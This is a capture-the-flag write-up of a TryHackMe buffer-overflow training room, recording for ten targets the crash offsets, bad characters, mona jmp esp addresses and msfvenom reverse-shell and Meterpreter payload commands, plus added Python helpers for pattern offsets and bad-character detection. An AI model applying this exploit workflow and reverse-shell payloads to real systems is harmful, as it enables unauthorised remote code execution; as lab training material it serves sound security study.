Buffer Overflow Prep
Date: 29 May 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
Connect to the machine using RDP:
Spiking is not necessary here, because we already know that all of the commands are vulnerable.
Scripts
Fuzzing
Finding Offset & overwriting EIP
Generate pattern using pattern_create:
Find offset using pattern_offset:
Finding Bad chars
Finding Right Module
Shell code & Shell Access
OVERFLOW 1
Fuzzing
Crash occurred at 2000 bytes
Finding Offset & overwriting EIP
Generate Pattern of length 2500
EIP VALUE = 6F43396E
Exact match at offset 1978
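How the EIP value maps to the offset, as an added example (my own Python, not the author's script and not Metasploit's pattern_create/pattern_offset code, although it generates the same Aa0Aa1Aa2...Zz9 sequence so the offsets agree with the tool). The debugger shows EIP as a little-endian 32-bit value, so the four bytes are reversed before searching the pattern; the big-endian reading is tried as a fallback for values copied out in the other order, and `None` is returned when the bytes in EIP are not part of the pattern at all (for example when the overwrite was cut short).

```python
import string


def pattern_create(length: int) -> bytes:
    """Generate `length` bytes of the Aa0Aa1Aa2... cyclic pattern.

    Each 3-byte group is <upper><lower><digit>; the sequence wraps after
    26 * 26 * 10 groups, exactly like pattern_create.rb.
    """
    out = bytearray()
    while len(out) < length:
        for upper in string.ascii_uppercase:
            for lower in string.ascii_lowercase:
                for digit in string.digits:
                    out += (upper + lower + digit).encode()
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_hex: str, length: int):
    """Return the offset of the 4 bytes seen in EIP inside a pattern of `length` bytes.

    EIP is displayed little-endian, so the byte order is reversed first;
    the raw order is tried second in case the value was written down
    big-endian. Returns None when neither order occurs in the pattern.
    """
    if eip_hex.lower().startswith("0x"):
        eip_hex = eip_hex[2:]
    pattern = pattern_create(length)
    raw = bytes.fromhex(eip_hex)
    for needle in (raw[::-1], raw):
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    # The values from OVERFLOW 1 above: pattern of 2500, EIP 6F43396E.
    print(pattern_offset("6F43396E", 2500))  # 1978
```

The pattern length passed to `pattern_offset` must be the same one used to generate the crash input; a shorter value can simply fail to contain the bytes.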
Finding Bad chars
Find the bad chars using mona:
\x00\x07\x2e\xa0
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x07\x2e\xa0"
JMP ESP address:
0x625011F7
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x07\x2e\xa0"
Don't forget to add a NOP sled.
Run the exploit & nc:
OVERFLOW 2
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 1200
EIP VALUE = 76413176
Exact match at offset 634
Finding Bad chars
Find the bad chars manually:
\x00\x23\x3c\x83\xba
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x23\x3c\x83\xba"
JMP ESP address:
0x625011BB
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x23\x3c\x83\xba"
Don't forget to add a NOP sled.
Run the exploit & nc:
OVERFLOW 3
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 1800
EIP VALUE = 35714234
Exact match at offset 1274
Found using:
!mona findmsp -distance <pattern length>
Finding Bad chars
Find the bad chars using mona:
\x00\x11\x40\x5f\xb8\xee
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x11\x40\x5f\xb8\xee"
JMP ESP address:
62501203
(Only two addresses were available!)
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -b "\x00\x11\x40\x5f\xb8\xee" -f py
Note: the Meterpreter shellcode is larger in size.
Don't forget to add a NOP sled.
Run the exploit & multi/handler in msfconsole:
OVERFLOW 4
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 2600
EIP VALUE = 005c394a
Exact match at offset 2026
Finding Bad chars
Find the bad chars using mona:
\x00\xa9\xcd\xd4
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\xa9\xcd\xd4"
JMP ESP address:
625011eb
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -b "\x00\xa9\xcd\xd4" -f py
Don't forget to add a NOP sled.
Run the exploit & multi/handler in msfconsole:
OVERFLOW 5
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 1000
EIP VALUE = 356b4134
Exact match at offset 314
Finding Bad chars
Find the bad chars manually:
\x00\x16\x2f\xf4\xfd
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x16\x2f\xf4\xfd"
JMP ESP address:
625011d3
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x16\x2f\xf4\xfd"
Don't forget to add a NOP sled.
Run the exploit & nc:
OVERFLOW 6
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 1600
EIP VALUE = 35694234
Exact match at offset 1034
Finding Bad chars
Find the bad chars using mona:
\x00\x08\x2c\xad
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x08\x2c\xad"
JMP ESP address:
625011f7
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x08\x2c\xad"
Don't forget to add a NOP sled.
Run the exploit & nc:
OVERFLOW 7
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 2000
EIP VALUE = 72423572
Exact match at offset 1306
Finding Bad chars
Find the bad chars manually:
\x00\x8c\xae\xbe\xfc
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x8c\xae\xbe\xfc"
JMP ESP address:
62501203
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f py -b "\x00\x8c\xae\xbe\xfc"
Don't forget to add a NOP sled.
Run the exploit & multi/handler:
OVERFLOW 8
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 2300
EIP VALUE = 68433568
Exact match at offset 1786
Finding Bad chars
Find the bad chars using mona:
\x00\x1d\x2e\xc7\xee
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x1d\x2e\xc7\xee"
JMP ESP address:
62501205
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f py -b "\x00\x1d\x2e\xc7\xee"
Don't forget to add a NOP sled.
Run the exploit & multi/handler:
OVERFLOW 9
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 2000
EIP VALUE = 35794234
Exact match at offset
Finding Bad chars
Find the bad chars using mona:
\x00\x04\x3e\x3f\xe1
Note: \x3f did not show up as a bad char in the first pass (but the answer in TryHackMe required 5 chars). On rerunning the script with \x3e replaced by a known-good byte, I found that \x3f is bad as well, and that it in turn had been affecting \x40. So if two bad characters are adjacent, they cannot both be determined in a single test: the first one masks the next. The exploit has to be run multiple times, removing one newly found bad char each time, to detect them all.
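The masking effect described in this note, as an added simulation that is not part of the original writeup. The target behaviour (`simulated_target`, which silently drops 0x3e and 0x3f from the copied data) is a constructed stand-in for the real application, and the byte-by-byte comparison mirrors what mona's bytearray compare does. A single pass flags every byte after the first dropped one as changed, because the dump is shifted, so \x3f and \x40 both look bad; only removing the first suspect and re-sending reveals that \x3f is a genuine bad char and \x40 is not.

```python
def build_test_bytes(exclude: set) -> bytes:
    """Every byte value 0x01..0xff in order, minus the ones already known bad.

    0x00 is assumed bad from the start, as in the lists above.
    """
    return bytes(b for b in range(1, 256) if b not in exclude)


def simulated_target(data: bytes) -> bytes:
    """Constructed stand-in for the vulnerable copy: 0x3e and 0x3f are dropped.

    A real check would compare the bytes mona dumps from the stack with
    the bytes that were sent; this function just produces such a dump.
    """
    return bytes(b for b in data if b not in (0x3E, 0x3F))


def naive_mismatches(sent: bytes, seen: bytes) -> list:
    """Single-pass comparison: every sent byte whose position differs in the dump.

    Once one byte is dropped, everything after it is shifted by one, so
    this over-reports: the real bad char and all bytes behind it.
    """
    return [sent[i] for i in range(len(sent)) if i >= len(seen) or sent[i] != seen[i]]


def first_mismatch(sent: bytes, seen: bytes):
    """Return the first sent byte that does not match the dump, or None if clean."""
    for i in range(len(sent)):
        if i >= len(seen) or sent[i] != seen[i]:
            return sent[i]
    return None


def find_bad_chars(target, max_passes: int = 10):
    """Iterate: send the candidate bytes, take only the first mismatch as bad,
    exclude it and resend, until a pass comes back unchanged.

    Returns (sorted list of bad byte values, number of passes used).
    """
    bad = {0x00}
    passes = 0
    while passes < max_passes:
        sent = build_test_bytes(bad)
        seen = target(sent)
        passes += 1
        suspect = first_mismatch(sent, seen)
        if suspect is None:
            break
        bad.add(suspect)
    return sorted(bad), passes


if __name__ == "__main__":
    first = build_test_bytes({0x00})
    print([hex(b) for b in naive_mismatches(first, simulated_target(first))[:3]])
    print([hex(b) for b in find_bad_chars(simulated_target)[0]])
```

Taking only the first mismatch per pass is the point: everything after it is unreliable in that dump, which is why the note above needed a rerun to separate \x3f (bad) from \x40 (merely shifted).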
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x04\x3e\x3f\xe1"
JMP ESP address:
625011c7
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x04\x3e\x3f\xe1"
Don't forget to add a NOP sled.
Run the exploit & nc:
OVERFLOW 10
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 1000
EIP VALUE = 41397241
Exact match at offset 537
Finding Bad chars
Find the bad chars using mona:
\x00\xa0\xad\xbe\xde\xef
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\xa0\xad\xbe\xde\xef"
JMP ESP address:
625011af
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\xa0\xad\xbe\xde\xef"
Don't forget to add a NOP sled.
Run the exploit & nc: